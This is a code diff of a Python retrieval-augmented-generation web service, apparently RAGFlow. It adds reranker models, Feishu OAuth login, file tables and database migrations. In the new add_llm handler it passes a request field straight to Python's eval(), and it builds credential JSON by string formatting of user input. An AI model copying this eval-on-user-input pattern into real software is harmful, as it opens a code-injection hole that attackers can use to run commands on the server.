||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid, get_format_time
|
||||
from api.db import StatusEnum, UserTenantRole
|
||||
from api.db import StatusEnum, UserTenantRole, FileSource
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.db_models import Knowledgebase
|
||||
from api.db.db_models import Knowledgebase, File
|
||||
from api.settings import stat_logger, RetCode
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.nlp import search
|
||||
from rag.utils import ELASTICSEARCH
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
|
||||
|
||||
@manager.route('/create', methods=['post'])
|
||||
@ -109,9 +111,9 @@ def detail():
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list():
|
||||
def list_kbs():
|
||||
page_number = request.args.get("page", 1)
|
||||
items_per_page = request.args.get("page_size", 15)
|
||||
items_per_page = request.args.get("page_size", 150)
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
@ -136,17 +138,14 @@ def rm():
|
||||
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
for doc in DocumentService.query(kb_id=req["kb_id"]):
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=doc.id), idxnm=search.index_name(kbs[0].tenant_id))
|
||||
|
||||
DocumentService.increment_chunk_num(
|
||||
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
|
||||
if not DocumentService.delete(doc):
|
||||
if not DocumentService.remove_document(doc, kbs[0].tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
f2d = File2DocumentService.get_by_document_id(doc.id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc.id)
|
||||
|
||||
if not KnowledgebaseService.update_by_id(
|
||||
req["kb_id"], {"status": StatusEnum.INVALID.value}):
|
||||
if not KnowledgebaseService.delete_by_id(req["kb_id"]):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Knowledgebase removal)!")
|
||||
return get_json_result(data=True)
|
||||
|
||||
@ -20,7 +20,7 @@ from api.utils.api_utils import server_error_response, get_data_error_result, va
|
||||
from api.db import StatusEnum, LLMType
|
||||
from api.db.db_models import TenantLLM
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.llm import EmbeddingModel, ChatModel
|
||||
from rag.llm import EmbeddingModel, ChatModel, RerankModel
|
||||
|
||||
|
||||
@manager.route('/factories', methods=['GET'])
|
||||
@ -28,7 +28,7 @@ from rag.llm import EmbeddingModel, ChatModel
|
||||
def factories():
|
||||
try:
|
||||
fac = LLMFactoriesService.get_all()
|
||||
return get_json_result(data=[f.to_dict() for f in fac if f.name not in ["QAnything", "FastEmbed"]])
|
||||
return get_json_result(data=[f.to_dict() for f in fac if f.name not in ["Youdao", "FastEmbed", "BAAI"]])
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
@ -39,17 +39,18 @@ def factories():
|
||||
def set_api_key():
|
||||
req = request.json
|
||||
# test if api key works
|
||||
chat_passed = False
|
||||
chat_passed, embd_passed, rerank_passed = False, False, False
|
||||
factory = req["llm_factory"]
|
||||
msg = ""
|
||||
for llm in LLMService.query(fid=factory):
|
||||
if llm.model_type == LLMType.EMBEDDING.value:
|
||||
if not embd_passed and llm.model_type == LLMType.EMBEDDING.value:
|
||||
mdl = EmbeddingModel[factory](
|
||||
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
|
||||
try:
|
||||
arr, tc = mdl.encode(["Test if the api key is available"])
|
||||
if len(arr[0]) == 0 or tc == 0:
|
||||
raise Exception("Fail")
|
||||
embd_passed = True
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access embedding model({llm.llm_name}) using this api key." + str(e)
|
||||
elif not chat_passed and llm.model_type == LLMType.CHAT.value:
|
||||
@ -60,10 +61,21 @@ def set_api_key():
|
||||
"temperature": 0.9})
|
||||
if not tc:
|
||||
raise Exception(m)
|
||||
chat_passed = True
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
|
||||
e)
|
||||
chat_passed = True
|
||||
elif not rerank_passed and llm.model_type == LLMType.RERANK:
|
||||
mdl = RerankModel[factory](
|
||||
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
|
||||
try:
|
||||
arr, tc = mdl.similarity("What's the weather?", ["Is it sunny today?"])
|
||||
if len(arr) == 0 or tc == 0:
|
||||
raise Exception("Fail")
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
|
||||
e)
|
||||
rerank_passed = True
|
||||
|
||||
if msg:
|
||||
return get_data_error_result(retmsg=msg)
|
||||
@ -96,20 +108,43 @@ def set_api_key():
|
||||
@validate_request("llm_factory", "llm_name", "model_type")
|
||||
def add_llm():
|
||||
req = request.json
|
||||
factory = req["llm_factory"]
|
||||
|
||||
if factory == "VolcEngine":
|
||||
# For VolcEngine, due to its special authentication method
|
||||
# Assemble volc_ak, volc_sk, endpoint_id into api_key
|
||||
temp = list(eval(req["llm_name"]).items())[0]
|
||||
llm_name = temp[0]
|
||||
endpoint_id = temp[1]
|
||||
api_key = '{' + f'"volc_ak": "{req.get("volc_ak", "")}", ' \
|
||||
f'"volc_sk": "{req.get("volc_sk", "")}", ' \
|
||||
f'"ep_id": "{endpoint_id}", ' + '}'
|
||||
elif factory == "Bedrock":
|
||||
# For Bedrock, due to its special authentication method
|
||||
# Assemble bedrock_ak, bedrock_sk, bedrock_region
|
||||
llm_name = req["llm_name"]
|
||||
api_key = '{' + f'"bedrock_ak": "{req.get("bedrock_ak", "")}", ' \
|
||||
f'"bedrock_sk": "{req.get("bedrock_sk", "")}", ' \
|
||||
f'"bedrock_region": "{req.get("bedrock_region", "")}", ' + '}'
|
||||
else:
|
||||
llm_name = req["llm_name"]
|
||||
api_key = "xxxxxxxxxxxxxxx"
|
||||
|
||||
llm = {
|
||||
"tenant_id": current_user.id,
|
||||
"llm_factory": req["llm_factory"],
|
||||
"llm_factory": factory,
|
||||
"model_type": req["model_type"],
|
||||
"llm_name": req["llm_name"],
|
||||
"llm_name": llm_name,
|
||||
"api_base": req.get("api_base", ""),
|
||||
"api_key": "xxxxxxxxxxxxxxx"
|
||||
"api_key": api_key
|
||||
}
|
||||
|
||||
factory = req["llm_factory"]
|
||||
msg = ""
|
||||
if llm["model_type"] == LLMType.EMBEDDING.value:
|
||||
mdl = EmbeddingModel[factory](
|
||||
key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
|
||||
key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
|
||||
model_name=llm["llm_name"],
|
||||
base_url=llm["api_base"])
|
||||
try:
|
||||
arr, tc = mdl.encode(["Test if the api key is available"])
|
||||
if len(arr[0]) == 0 or tc == 0:
|
||||
@ -118,7 +153,10 @@ def add_llm():
|
||||
msg += f"\nFail to access embedding model({llm['llm_name']})." + str(e)
|
||||
elif llm["model_type"] == LLMType.CHAT.value:
|
||||
mdl = ChatModel[factory](
|
||||
key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
|
||||
key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
|
||||
model_name=llm["llm_name"],
|
||||
base_url=llm["api_base"]
|
||||
)
|
||||
try:
|
||||
m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
|
||||
"temperature": 0.9})
|
||||
@ -134,7 +172,6 @@ def add_llm():
|
||||
if msg:
|
||||
return get_data_error_result(retmsg=msg)
|
||||
|
||||
|
||||
if not TenantLLMService.filter_update(
|
||||
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory, TenantLLM.llm_name == llm["llm_name"]], llm):
|
||||
TenantLLMService.save(**llm)
|
||||
@ -142,6 +179,16 @@ def add_llm():
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/delete_llm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("llm_factory", "llm_name")
|
||||
def delete_llm():
|
||||
req = request.json
|
||||
TenantLLMService.filter_delete(
|
||||
[TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == req["llm_factory"], TenantLLM.llm_name == req["llm_name"]])
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/my_llms', methods=['GET'])
|
||||
@login_required
|
||||
def my_llms():
|
||||
@ -165,7 +212,7 @@ def my_llms():
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list():
|
||||
def list_app():
|
||||
model_type = request.args.get("model_type")
|
||||
try:
|
||||
objs = TenantLLMService.query(tenant_id=current_user.id)
|
||||
@ -174,7 +221,7 @@ def list():
|
||||
llms = [m.to_dict()
|
||||
for m in llms if m.status == StatusEnum.VALID.value]
|
||||
for m in llms:
|
||||
m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["QAnything","FastEmbed"]
|
||||
m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["Youdao","FastEmbed", "BAAI"]
|
||||
|
||||
llm_set = set([m["llm_name"] for m in llms])
|
||||
for o in objs:
|
||||
@ -184,7 +231,7 @@ def list():
|
||||
|
||||
res = {}
|
||||
for m in llms:
|
||||
if model_type and m["model_type"] != model_type:
|
||||
if model_type and m["model_type"].find(model_type)<0:
|
||||
continue
|
||||
if m["fid"] not in res:
|
||||
res[m["fid"]] = []
|
||||
|
||||
68
api/apps/system_app.py
Normal file
68
api/apps/system_app.py
Normal file
@ -0,0 +1,68 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License
|
||||
#
|
||||
from flask_login import login_required
|
||||
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.utils.api_utils import get_json_result
|
||||
from api.versions import get_rag_version
|
||||
from rag.settings import SVR_QUEUE_NAME
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils.minio_conn import MINIO
|
||||
from timeit import default_timer as timer
|
||||
|
||||
from rag.utils.redis_conn import REDIS_CONN
|
||||
|
||||
|
||||
@manager.route('/version', methods=['GET'])
|
||||
@login_required
|
||||
def version():
|
||||
return get_json_result(data=get_rag_version())
|
||||
|
||||
|
||||
@manager.route('/status', methods=['GET'])
|
||||
@login_required
|
||||
def status():
|
||||
res = {}
|
||||
st = timer()
|
||||
try:
|
||||
res["es"] = ELASTICSEARCH.health()
|
||||
res["es"]["elapsed"] = "{:.1f}".format((timer() - st)*1000.)
|
||||
except Exception as e:
|
||||
res["es"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
|
||||
|
||||
st = timer()
|
||||
try:
|
||||
MINIO.health()
|
||||
res["minio"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
|
||||
except Exception as e:
|
||||
res["minio"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
|
||||
|
||||
st = timer()
|
||||
try:
|
||||
KnowledgebaseService.get_by_id("x")
|
||||
res["mysql"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
|
||||
except Exception as e:
|
||||
res["mysql"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
|
||||
|
||||
st = timer()
|
||||
try:
|
||||
qinfo = REDIS_CONN.health(SVR_QUEUE_NAME)
|
||||
res["redis"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.),
|
||||
"pending": qinfo.get("pending", 0)}
|
||||
except Exception as e:
|
||||
res["redis"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
|
||||
|
||||
return get_json_result(data=res)
|
||||
@ -13,7 +13,9 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
import re
|
||||
from datetime import datetime
|
||||
|
||||
from flask import request, session, redirect
|
||||
from werkzeug.security import generate_password_hash, check_password_hash
|
||||
@ -22,11 +24,13 @@ from flask_login import login_required, current_user, login_user, logout_user
|
||||
from api.db.db_models import TenantLLM
|
||||
from api.db.services.llm_service import TenantLLMService, LLMService
|
||||
from api.utils.api_utils import server_error_response, validate_request
|
||||
from api.utils import get_uuid, get_format_time, decrypt, download_img
|
||||
from api.db import UserTenantRole, LLMType
|
||||
from api.settings import RetCode, GITHUB_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, API_KEY, \
|
||||
LLM_FACTORY, LLM_BASE_URL
|
||||
from api.utils import get_uuid, get_format_time, decrypt, download_img, current_timestamp, datetime_format
|
||||
from api.db import UserTenantRole, LLMType, FileType
|
||||
from api.settings import RetCode, GITHUB_OAUTH, FEISHU_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, \
|
||||
API_KEY, \
|
||||
LLM_FACTORY, LLM_BASE_URL, RERANK_MDL
|
||||
from api.db.services.user_service import UserService, TenantService, UserTenantService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.settings import stat_logger
|
||||
from api.utils.api_utils import get_json_result, cors_reponse
|
||||
|
||||
@ -56,6 +60,8 @@ def login():
|
||||
response_data = user.to_json()
|
||||
user.access_token = get_uuid()
|
||||
login_user(user)
|
||||
user.update_time = current_timestamp(),
|
||||
user.update_date = datetime_format(datetime.now()),
|
||||
user.save()
|
||||
msg = "Welcome back!"
|
||||
return cors_reponse(data=response_data, auth=user.get_id(), retmsg=msg)
|
||||
@ -118,6 +124,79 @@ def github_callback():
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
|
||||
|
||||
@manager.route('/feishu_callback', methods=['GET'])
|
||||
def feishu_callback():
|
||||
import requests
|
||||
app_access_token_res = requests.post(FEISHU_OAUTH.get("app_access_token_url"), data=json.dumps({
|
||||
"app_id": FEISHU_OAUTH.get("app_id"),
|
||||
"app_secret": FEISHU_OAUTH.get("app_secret")
|
||||
}), headers={"Content-Type": "application/json; charset=utf-8"})
|
||||
app_access_token_res = app_access_token_res.json()
|
||||
if app_access_token_res['code'] != 0:
|
||||
return redirect("/?error=%s" % app_access_token_res)
|
||||
|
||||
res = requests.post(FEISHU_OAUTH.get("user_access_token_url"), data=json.dumps({
|
||||
"grant_type": FEISHU_OAUTH.get("grant_type"),
|
||||
"code": request.args.get('code')
|
||||
}), headers={"Content-Type": "application/json; charset=utf-8",
|
||||
'Authorization': f"Bearer {app_access_token_res['app_access_token']}"})
|
||||
res = res.json()
|
||||
if res['code'] != 0:
|
||||
return redirect("/?error=%s" % res["message"])
|
||||
|
||||
if "contact:user.email:readonly" not in res["data"]["scope"].split(" "):
|
||||
return redirect("/?error=contact:user.email:readonly not in scope")
|
||||
session["access_token"] = res["data"]["access_token"]
|
||||
session["access_token_from"] = "feishu"
|
||||
userinfo = user_info_from_feishu(session["access_token"])
|
||||
users = UserService.query(email=userinfo["email"])
|
||||
user_id = get_uuid()
|
||||
if not users:
|
||||
try:
|
||||
try:
|
||||
avatar = download_img(userinfo["avatar_url"])
|
||||
except Exception as e:
|
||||
stat_logger.exception(e)
|
||||
avatar = ""
|
||||
users = user_register(user_id, {
|
||||
"access_token": session["access_token"],
|
||||
"email": userinfo["email"],
|
||||
"avatar": avatar,
|
||||
"nickname": userinfo["en_name"],
|
||||
"login_channel": "feishu",
|
||||
"last_login_time": get_format_time(),
|
||||
"is_superuser": False,
|
||||
})
|
||||
if not users:
|
||||
raise Exception('Register user failure.')
|
||||
if len(users) > 1:
|
||||
raise Exception('Same E-mail exist!')
|
||||
user = users[0]
|
||||
login_user(user)
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
except Exception as e:
|
||||
rollback_user_registration(user_id)
|
||||
stat_logger.exception(e)
|
||||
return redirect("/?error=%s" % str(e))
|
||||
user = users[0]
|
||||
user.access_token = get_uuid()
|
||||
login_user(user)
|
||||
user.save()
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
|
||||
|
||||
def user_info_from_feishu(access_token):
|
||||
import requests
|
||||
headers = {"Content-Type": "application/json; charset=utf-8",
|
||||
'Authorization': f"Bearer {access_token}"}
|
||||
res = requests.get(
|
||||
f"https://open.feishu.cn/open-apis/authen/v1/user_info",
|
||||
headers=headers)
|
||||
user_info = res.json()["data"]
|
||||
user_info["email"] = None if user_info.get("email") == "" else user_info["email"]
|
||||
return user_info
|
||||
|
||||
|
||||
def user_info_from_github(access_token):
|
||||
import requests
|
||||
headers = {"Accept": "application/json",
|
||||
@ -196,7 +275,7 @@ def rollback_user_registration(user_id):
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
TenantLLM.delete().where(TenantLLM.tenant_id == user_id).excute()
|
||||
TenantLLM.delete().where(TenantLLM.tenant_id == user_id).execute()
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
@ -210,7 +289,8 @@ def user_register(user_id, user):
|
||||
"embd_id": EMBEDDING_MDL,
|
||||
"asr_id": ASR_MDL,
|
||||
"parser_ids": PARSERS,
|
||||
"img2txt_id": IMAGE2TEXT_MDL
|
||||
"img2txt_id": IMAGE2TEXT_MDL,
|
||||
"rerank_id": RERANK_MDL
|
||||
}
|
||||
usr_tenant = {
|
||||
"tenant_id": user_id,
|
||||
@ -218,6 +298,17 @@ def user_register(user_id, user):
|
||||
"invited_by": user_id,
|
||||
"role": UserTenantRole.OWNER
|
||||
}
|
||||
file_id = get_uuid()
|
||||
file = {
|
||||
"id": file_id,
|
||||
"parent_id": file_id,
|
||||
"tenant_id": user_id,
|
||||
"created_by": user_id,
|
||||
"name": "/",
|
||||
"type": FileType.FOLDER.value,
|
||||
"size": 0,
|
||||
"location": "",
|
||||
}
|
||||
tenant_llm = []
|
||||
for llm in LLMService.query(fid=LLM_FACTORY):
|
||||
tenant_llm.append({"tenant_id": user_id,
|
||||
@ -233,6 +324,7 @@ def user_register(user_id, user):
|
||||
TenantService.insert(**tenant)
|
||||
UserTenantService.insert(**usr_tenant)
|
||||
TenantLLMService.insert_many(tenant_llm)
|
||||
FileService.insert(file)
|
||||
return UserService.query(email=user["email"])
|
||||
|
||||
|
||||
|
||||
16
api/contants.py
Normal file
16
api/contants.py
Normal file
@ -0,0 +1,16 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
NAME_LENGTH_LIMIT = 2 ** 10
|
||||
@ -45,6 +45,8 @@ class FileType(StrEnum):
|
||||
VISUAL = 'visual'
|
||||
AURAL = 'aural'
|
||||
VIRTUAL = 'virtual'
|
||||
FOLDER = 'folder'
|
||||
OTHER = "other"
|
||||
|
||||
|
||||
class LLMType(StrEnum):
|
||||
@ -52,6 +54,7 @@ class LLMType(StrEnum):
|
||||
EMBEDDING = 'embedding'
|
||||
SPEECH2TEXT = 'speech2text'
|
||||
IMAGE2TEXT = 'image2text'
|
||||
RERANK = 'rerank'
|
||||
|
||||
|
||||
class ChatStyle(StrEnum):
|
||||
@ -62,6 +65,7 @@ class ChatStyle(StrEnum):
|
||||
|
||||
|
||||
class TaskStatus(StrEnum):
|
||||
UNSTART = "0"
|
||||
RUNNING = "1"
|
||||
CANCEL = "2"
|
||||
DONE = "3"
|
||||
@ -80,3 +84,16 @@ class ParserType(StrEnum):
|
||||
NAIVE = "naive"
|
||||
PICTURE = "picture"
|
||||
ONE = "one"
|
||||
|
||||
|
||||
class FileSource(StrEnum):
|
||||
LOCAL = ""
|
||||
KNOWLEDGEBASE = "knowledgebase"
|
||||
S3 = "s3"
|
||||
|
||||
|
||||
class CanvasType(StrEnum):
|
||||
ChatBot = "chatbot"
|
||||
DocBot = "docbot"
|
||||
|
||||
KNOWLEDGEBASE_FOLDER_NAME=".knowledgebase"
|
||||
@ -21,14 +21,13 @@ import operator
|
||||
from functools import wraps
|
||||
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer
|
||||
from flask_login import UserMixin
|
||||
|
||||
from playhouse.migrate import MySQLMigrator, migrate
|
||||
from peewee import (
|
||||
BigAutoField, BigIntegerField, BooleanField, CharField,
|
||||
CompositeKey, Insert, IntegerField, TextField, FloatField, DateTimeField,
|
||||
BigIntegerField, BooleanField, CharField,
|
||||
CompositeKey, IntegerField, TextField, FloatField, DateTimeField,
|
||||
Field, Model, Metadata
|
||||
)
|
||||
from playhouse.pool import PooledMySQLDatabase
|
||||
|
||||
from api.db import SerializedType, ParserType
|
||||
from api.settings import DATABASE, stat_logger, SECRET_KEY
|
||||
from api.utils.log_utils import getLogger
|
||||
@ -344,7 +343,7 @@ class DataBaseModel(BaseModel):
|
||||
|
||||
|
||||
@DB.connection_context()
|
||||
def init_database_tables():
|
||||
def init_database_tables(alter_fields=[]):
|
||||
members = inspect.getmembers(sys.modules[__name__], inspect.isclass)
|
||||
table_objs = []
|
||||
create_failed_list = []
|
||||
@ -361,6 +360,7 @@ def init_database_tables():
|
||||
if create_failed_list:
|
||||
LOGGER.info(f"create tables failed: {create_failed_list}")
|
||||
raise Exception(f"create tables failed: {create_failed_list}")
|
||||
migrate_db()
|
||||
|
||||
|
||||
def fill_db_model_object(model_object, human_model_dict):
|
||||
@ -386,7 +386,7 @@ class User(DataBaseModel, UserMixin):
|
||||
max_length=32,
|
||||
null=True,
|
||||
help_text="English|Chinese",
|
||||
default="English")
|
||||
default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English")
|
||||
color_schema = CharField(
|
||||
max_length=32,
|
||||
null=True,
|
||||
@ -437,6 +437,10 @@ class Tenant(DataBaseModel):
|
||||
max_length=128,
|
||||
null=False,
|
||||
help_text="default image to text model ID")
|
||||
rerank_id = CharField(
|
||||
max_length=128,
|
||||
null=False,
|
||||
help_text="default rerank model ID")
|
||||
parser_ids = CharField(
|
||||
max_length=256,
|
||||
null=False,
|
||||
@ -578,7 +582,7 @@ class Knowledgebase(DataBaseModel):
|
||||
language = CharField(
|
||||
max_length=32,
|
||||
null=True,
|
||||
default="English",
|
||||
default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English",
|
||||
help_text="English|Chinese")
|
||||
description = TextField(null=True, help_text="KB description")
|
||||
embd_id = CharField(
|
||||
@ -629,7 +633,7 @@ class Document(DataBaseModel):
|
||||
max_length=128,
|
||||
null=False,
|
||||
default="local",
|
||||
help_text="where dose this document from")
|
||||
help_text="where dose this document come from")
|
||||
type = CharField(max_length=32, null=False, help_text="file extension")
|
||||
created_by = CharField(
|
||||
max_length=32,
|
||||
@ -669,6 +673,66 @@ class Document(DataBaseModel):
|
||||
db_table = "document"
|
||||
|
||||
|
||||
class File(DataBaseModel):
|
||||
id = CharField(
|
||||
max_length=32,
|
||||
primary_key=True,
|
||||
)
|
||||
parent_id = CharField(
|
||||
max_length=32,
|
||||
null=False,
|
||||
help_text="parent folder id",
|
||||
index=True)
|
||||
tenant_id = CharField(
|
||||
max_length=32,
|
||||
null=False,
|
||||
help_text="tenant id",
|
||||
index=True)
|
||||
created_by = CharField(
|
||||
max_length=32,
|
||||
null=False,
|
||||
help_text="who created it")
|
||||
name = CharField(
|
||||
max_length=255,
|
||||
null=False,
|
||||
help_text="file name or folder name",
|
||||
index=True)
|
||||
location = CharField(
|
||||
max_length=255,
|
||||
null=True,
|
||||
help_text="where dose it store")
|
||||
size = IntegerField(default=0)
|
||||
type = CharField(max_length=32, null=False, help_text="file extension")
|
||||
source_type = CharField(
|
||||
max_length=128,
|
||||
null=False,
|
||||
default="",
|
||||
help_text="where dose this document come from")
|
||||
|
||||
class Meta:
|
||||
db_table = "file"
|
||||
|
||||
|
||||
class File2Document(DataBaseModel):
|
||||
id = CharField(
|
||||
max_length=32,
|
||||
primary_key=True,
|
||||
)
|
||||
file_id = CharField(
|
||||
max_length=32,
|
||||
null=True,
|
||||
help_text="file id",
|
||||
index=True)
|
||||
document_id = CharField(
|
||||
max_length=32,
|
||||
null=True,
|
||||
help_text="document id",
|
||||
index=True)
|
||||
|
||||
class Meta:
|
||||
db_table = "file2document"
|
||||
|
||||
|
||||
class Task(DataBaseModel):
|
||||
id = CharField(max_length=32, primary_key=True)
|
||||
doc_id = CharField(max_length=32, null=False, index=True)
|
||||
@ -695,11 +759,11 @@ class Dialog(DataBaseModel):
|
||||
language = CharField(
|
||||
max_length=32,
|
||||
null=True,
|
||||
default="Chinese",
|
||||
default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English",
|
||||
help_text="English|Chinese")
|
||||
llm_id = CharField(max_length=32, null=False, help_text="default llm ID")
|
||||
llm_id = CharField(max_length=128, null=False, help_text="default llm ID")
|
||||
llm_setting = JSONField(null=False, default={"temperature": 0.1, "top_p": 0.3, "frequency_penalty": 0.7,
|
||||
"presence_penalty": 0.4, "max_tokens": 215})
|
||||
"presence_penalty": 0.4, "max_tokens": 512})
|
||||
prompt_type = CharField(
|
||||
max_length=16,
|
||||
null=False,
|
||||
@ -711,11 +775,16 @@ class Dialog(DataBaseModel):
|
||||
similarity_threshold = FloatField(default=0.2)
|
||||
vector_similarity_weight = FloatField(default=0.3)
|
||||
top_n = IntegerField(default=6)
|
||||
top_k = IntegerField(default=1024)
|
||||
do_refer = CharField(
|
||||
max_length=1,
|
||||
null=False,
|
||||
help_text="it needs to insert reference index into answer or not",
|
||||
default="1")
|
||||
rerank_id = CharField(
|
||||
max_length=128,
|
||||
null=False,
|
||||
help_text="default rerank model ID")
|
||||
|
||||
kb_ids = JSONField(null=False, default=[])
|
||||
status = CharField(
|
||||
@ -762,3 +831,57 @@ class API4Conversation(DataBaseModel):
|
||||
|
||||
class Meta:
|
||||
db_table = "api_4_conversation"
|
||||
|
||||
|
||||
class UserCanvas(DataBaseModel):
|
||||
id = CharField(max_length=32, primary_key=True)
|
||||
avatar = TextField(null=True, help_text="avatar base64 string")
|
||||
user_id = CharField(max_length=255, null=False, help_text="user_id")
|
||||
title = CharField(max_length=255, null=True, help_text="Canvas title")
|
||||
description = TextField(null=True, help_text="Canvas description")
|
||||
canvas_type = CharField(max_length=32, null=True, help_text="Canvas type")
|
||||
dsl = JSONField(null=True, default={})
|
||||
|
||||
class Meta:
|
||||
db_table = "user_canvas"
|
||||
|
||||
|
||||
class CanvasTemplate(DataBaseModel):
|
||||
id = CharField(max_length=32, primary_key=True)
|
||||
avatar = TextField(null=True, help_text="avatar base64 string")
|
||||
title = CharField(max_length=255, null=True, help_text="Canvas title")
|
||||
description = TextField(null=True, help_text="Canvas description")
|
||||
canvas_type = CharField(max_length=32, null=True, help_text="Canvas type")
|
||||
dsl = JSONField(null=True, default={})
|
||||
|
||||
class Meta:
|
||||
db_table = "canvas_template"
|
||||
|
||||
|
||||
def migrate_db():
|
||||
with DB.transaction():
|
||||
migrator = MySQLMigrator(DB)
|
||||
try:
|
||||
migrate(
|
||||
migrator.add_column('file', 'source_type', CharField(max_length=128, null=False, default="", help_text="where dose this document come from"))
|
||||
)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
migrate(
|
||||
migrator.add_column('tenant', 'rerank_id', CharField(max_length=128, null=False, default="BAAI/bge-reranker-v2-m3", help_text="default rerank model ID"))
|
||||
)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
migrate(
|
||||
migrator.add_column('dialog', 'rerank_id', CharField(max_length=128, null=False, default="", help_text="default rerank model ID"))
|
||||
)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
migrate(
|
||||
migrator.add_column('dialog', 'top_k', IntegerField(default=1024))
|
||||
)
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
@ -13,16 +13,22 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
import os
|
||||
import time
|
||||
import uuid
|
||||
from copy import deepcopy
|
||||
|
||||
from api.db import LLMType, UserTenantRole
|
||||
from api.db.db_models import init_database_tables as init_web_db, LLMFactories, LLM, TenantLLM
|
||||
from api.db.services import UserService
|
||||
from api.db.services.canvas_service import CanvasTemplateService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMFactoriesService, LLMService, TenantLLMService, LLMBundle
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
